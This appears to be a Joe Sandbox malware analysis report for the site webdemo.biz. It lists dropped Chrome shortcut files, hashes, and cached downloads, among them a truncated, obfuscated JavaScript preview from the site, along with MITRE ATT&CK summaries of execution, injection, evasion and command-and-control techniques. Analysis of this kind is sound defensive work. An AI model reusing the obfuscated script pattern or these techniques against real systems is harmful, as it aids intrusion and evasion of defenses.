Preview:	L..................F.@.. ...$+.,.....%..!+..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I^Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V^Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V^Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V^Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V^Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............=.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2689
Entropy (8bit):	4.0113330630199435
Encrypted:	false
SSDEEP:
MD5:	F7A81E6896858ABABD6E73BF7029F197
SHA1:	D9B92E735E758111CCBEF13622A2626B8225E685
SHA-256:	D11659631FEA3F008EEC432142ADCA87514A5AE9114421D5C393135F779203F2
SHA-512:	B65AB428DDC80DC0520D4EBDF578EA0A1D3C846264CEC2D55C6D8CF9548E856EC2686F4DA62AF8B2A524A260812252061A2647E788A0D54008574123FBD3F5E1
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I^Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V^Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V^Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V^Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............=.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 30 22:15:04 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	4.004480864411426
Encrypted:	false
SSDEEP:
MD5:	8B8B459CF9B04D4365B02D6BA153ED59
SHA1:	2EBD57E43603CAD9C48FA7CBAB9F8724B4AB6AC5
SHA-256:	F98136684C7877A848F2F783421A71219B87C132C94AAAB27ED0BAF50DD35EB9
SHA-512:	ECB865D1DED4F4FEB524348BBB196409382A2A8C47CD13059A856C8E055D91C700EA1D47E460C1CA7B1B8851F4F99B32A02BC648C47C35DAA6F5698DC24F5C99
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,........!+..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I^Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V^Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V^Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V^Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V^Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............=.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 30 22:15:04 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9917717461617763
Encrypted:	false
SSDEEP:
MD5:	53449DFA2DE5117B509D07BD1C4B38C3
SHA1:	EF286E1F6F5A27CC4F44A0FB14C3D1DC47915CA0
SHA-256:	D8CC81F66C91B7061E75D6EC73E62C2291D66D27EC6A8079F76AE67F1E3959E2
SHA-512:	135B7150E1C7DB0C886F0613BD4DCF987746935CC0540FD27A4DD43895A0B5E17AA2B994E1E559D824F4F3EFA9BCE96217564CD734372A5C6E46F169724184D6
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....n.!+..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I^Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V^Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V^Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V^Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V^Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............=.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 30 22:15:04 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9992940850539185
Encrypted:	false
SSDEEP:
MD5:	55C0ED6486492479A2142D069EA52CCC
SHA1:	957D71BC1072BD46CAA28EC044B42E6A7334F8F6
SHA-256:	14F4C0C0FDA6250A1AA5C7A7A0AAEF9192E8E21FDF1F0A41F7729563B64B06AF
SHA-512:	1D59B78508F83D4F34AF1798EE38D2348548DC0C3DE2B1E21D2D3E756026999779D8B9AD9BDA55115D65E6D5F0311353201DB77322A63B45D80A1ABA93AA6192
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....L...!+..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I^Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V^Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V^Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V^Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V^Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............=.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 81

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (65488), with no line terminators
Category:	downloaded
Size (bytes):	67842
Entropy (8bit):	5.787506376022805
Encrypted:	false
SSDEEP:
MD5:	4D89ED3D2A8794DF472F060337B87424
SHA1:	3F1F098C00C7C3B51D7714E7BC78FA2E065B2C10
SHA-256:	D5474245A06F3FE94F9DFACCB3317A91433B158D6A0DF7A69B88E330EA1E489B
SHA-512:	6B800F39F09B898EA39C4098F6C374964D13B2450600E57D989C498251D7A481AA036B4C711C5D50F7F07A0FF3D17D8A45E347841AD222B3E75096F66F710872
Malicious:	false
Reputation:	unknown
URL:	https://webdemo.biz/
Preview:	<script>;Function("'e+v[y%5]2594{ycsz#ja%twtr@twc{_!]~ow7[_!.n%n-7h^qex,9&pt,v+7y!vp215-,aguwem6.q5614x.7a@kly!esem89urk..n4f{z{hgjlf&2ho%k&!g2a5q7hpqn3+-gc}2[4.^n!x46#pf-tp%8+hf-}}%_k~@9jt}e]e#9e5g7k7vl6o425i,e],i2~y1ulrmekcuc5azl61^e_keo-{%p#tm%}wq3@w3cm^%c.rscm~r@a{1+uervv,+]j]u]k9o![i12pml8]5.+zk-ms38_i{{6^5[#g~cwg2i&}-#&ifyo3zi4-!qna@xvzls@ph+np,!s_39zq@2~+rx4yzf8~vy3t3{v}&3m]47qs9w9{o,[s}ern@^@ff^1_e#[!hfujzjg#[6an#g6tzxe[_xcg7#1&~i_6m}8sjhfu91o~^8laq}ope6x&,.&ulhaj,yvj3%.^w4_[een8yqoe7i18xxuhi&j~kl-]w+sr^r8t';_TnvD4h58gdI59ysb45Rcn1oyyI8S39T7LDG0U0DYCLNKHpfo=(_TnvD4h58gdI59ysb45Rcn1oyyI8S39T7LDG0U0DYCLNKHelect)=>!_TnvD4h58gdI59ysb45Rcn1oyyI8S39T7LDG0U0DYCLNKHelect?\"QBsepJWblmT6ik34tUdQ\"[_XEs5oG59W9h3nQY3KK8NBxY057j0R63Uw28gpAf7xXMfV5kvM()](/[JbkQ4T3mU6WBde]/g,\"\"):(_TnvD4h58gdI59ysb45Rcn1oyyI8S39T7LDG0U0DYCLNKHelect==1?\"qwfLvloGqTrYEXMaecXRZhteg\"[_XEs5oG59W9h3nQY3KK8NBxY057j0R63Uw28gpAf7xXMfV5kvM()](/[RgXeMGYwvqtLTZl]/g,\"\"):\"HpF09umnkHJc65Zt5iAosnm\"[_XEs5oG59W

Chrome Cache Entry: 82

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	274
Entropy (8bit):	5.2132093995490845
Encrypted:	false
SSDEEP:
MD5:	90F58FFD4C29781057BD2FCE81DF0169
SHA1:	AA77C43513BDB7B0BA85ECC60D4E94C7D767CD2A
SHA-256:	CA4A6F09591B2727876A6F7056CFEEF222C448E749D7DDD6E203B8ECEA16A459
SHA-512:	3D181BA765876B44AD7FF5632D66933A0AC86DF903EA93B1BC7A62EE5BCCFEE9C1FACFF0F7CEEBA5702E75FD502C88E6BB60E99360B76627EB7D1DF487CCB791
Malicious:	false
Reputation:	unknown
URL:	https://webdemo.biz/favicon.ico
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<hr>.<address>Apache/2.4.52 (Ubuntu) Server at webdemo.biz Port 443</address>.</body></html>.

Chrome Cache Entry: 83

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 52648, version 1.0
Category:	downloaded
Size (bytes):	52648
Entropy (8bit):	7.996033428788516
Encrypted:	true
SSDEEP:
MD5:	657E828FB3A5963706E24CBF9D711BB8
SHA1:	84C08557D977E0A46EC8941B2D84235069DAB229
SHA-256:	45E39853C41558C4922FF1B0895547A99E378F136EC3D9D2F4DF15CC269485FA
SHA-512:	EEBEDF24A2516B860FFA2C9241474157604F8FC2EDC9E3BF3C0A0DDDF3168519F13FC195D48D232ED8F4A5DB1C48EF0563D62B2E2BDCF55F936CBD319AB18E16
Malicious:	false
Reputation:	unknown
URL:	https://use.fontawesome.com/releases/v5.0.0/webfonts/fa-brands-400.woff2
Preview:	wOF2.............r....V.........................T.V..f...h..X.6.$..\|..... ....m[.#qB..........v......@(B...............1......T+.....d.2OaAf.j.....b.>.........?2\|/F...PRJ4[ &..b....E......../...q..4`MD.c...-\|.a.q.b..h..m..4....... ..N...?B....k.?.Ja.F7=....u\|....zx..z..L.....ht......:w.-.P..!...Yh..q.=..'aP[........ .d.u......D65...,.HD.6..........8..4...(...V.........Q..../...8@.+J.B..I.L........N...sn.n............&.5.rC0.nc,.X...".0r......D.."F.6........b..._.....q$.c.[.y......../.0..#..$,.?..P......_...J..&...).c^.do...;~.....^...K...........7.[...BN..I.o.8.....{.....K.I#....~w._[e..... ..C@.n*.qd.....]T..Im.....';...."Y.,S$.I.N...6....m.!...;...2.m9E.\..d.=.W...{...S.#...y$T...]G...Bdp^.#.B....@a];.Q}....._.f..Y.I-....!9...].F/a.[.^..0..VMw..@..]...[.......-.~....U..)m....fc..N..-..iI.l]........u.{..k.y....+)X-.+p.V<.19.q.u8...T....n"..u....~..lIj.\..l....Pa$.$....i.....4%.....k.....e...\l9d..d...R.ij..NHRP:..>...s`.\|

Chrome Cache Entry: 84

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (33229)
Category:	downloaded
Size (bytes):	33407
Entropy (8bit):	4.7584710387647835
Encrypted:	false
SSDEEP:
MD5:	E35D9C4EBAEA0573DF8E4A9505B72EEA
SHA1:	5FBB384CD8CD7A64483E6487D8D8179A633F9954
SHA-256:	9F29F2BBB25602F4BDBD3122C317244F8FD9741106FFD5A412574B02EE794993
SHA-512:	C571015753B927017B3BEC2B1C0B0103DE27DCC5E805E1DAF8A1459E0F797ABA38FF0592F93CBEC80B98F574B18455DDBC65A1F38A8AED5ACF14EB8CE2D7265C
Malicious:	false
Reputation:	unknown
URL:	https://use.fontawesome.com/releases/v5.0.0/css/all.css
Preview:	/!. Font Awesome Free 5.0.0 by @fontawesome - http://fontawesome.com. * License - http://fontawesome.com/license (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,.fab,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-left{float

Chrome Cache Entry: 85

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 80 x 32, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	1606
Entropy (8bit):	7.810373996731552
Encrypted:	false
SSDEEP:
MD5:	EB6B97BF8AA1F306E937E8435CEE00AD
SHA1:	80390CB509BCE770227A46D8CAA5E7D138814837
SHA-256:	FCE99D7A035FF396A654347027F961BC159BDAD24CFF474E9B8B485595A8D7F7
SHA-512:	F75356B0FA9CAE560050D3349194A3E2077E3739E17D86A1149511DF608B55461F848CB3C0FFFAE5B228C8068718A91C7A5553BFBD4E1832847307998DB84EDE
Malicious:	false
Reputation:	unknown
URL:	https://i.ibb.co/t8b1Qdw/1q.png
Preview:	.PNG........IHDR...P... ......3.l....sRGB.........gAMA......a.....pHYs..........(J.....IDAThC..H.W...^uZLg3u..mE6...b......#.D.l..T...F..T......%CrV..0c.."..rl.._.L...={......5.X...y<..<...9.s.{......g.Z7.;......]M....o(....^...^.{e%.x.....3gN..w.@+M.o.V..ao&....x.(........h9..+...waM>.X...9.f..F..~.t....[.n}.4...ng....4..~.fFA..>...Uf..`.K........z..K.'......1u...{..}D.........g.+mzL.@.)..P.k.....P.a...k$o./M...T.G.].;.V......u..y.<..~-......(d...w......G....CY.C=`5_.m?(.?.....;....#'.g=.....-_Q....2et..e...W.(...Z....+m<.o..,._..:.{.Y<.-...{..V.B<\|.^}.,..u.b.....i...c.i+X....#w.K..k.iV.<.N.<.....-...Ux.0.]...v.Az..........QW..f...?.w..Js-.7....k.`..N,6...... W)fZ..~QW....I....:x..2.0.&"...../%..Xk.2L.o......r.5.=.>'L........C.f.....;w...'..\|....TUU.s.'.Ha{....7o.O.....o.i../^..[.0F..G.r..".yzz.S.N....\|i.t..322.^[[+ua........xCC.1>77...r..9....zqq...^...yhh..STT..;s.q?ooo.~.z^RRb.W.^m...7.a........W.b.........0.n..~...X........7......Ajj*.

Static File Info

⊘No static file info

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://webdemo.biz/

Overview

General Information

Detection

Signatures

Classification

Process Tree

Yara Signatures

Dropped Files

Memory Dumps

HTML

Sigma Signatures

System Summary

Remote Access Functionality

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

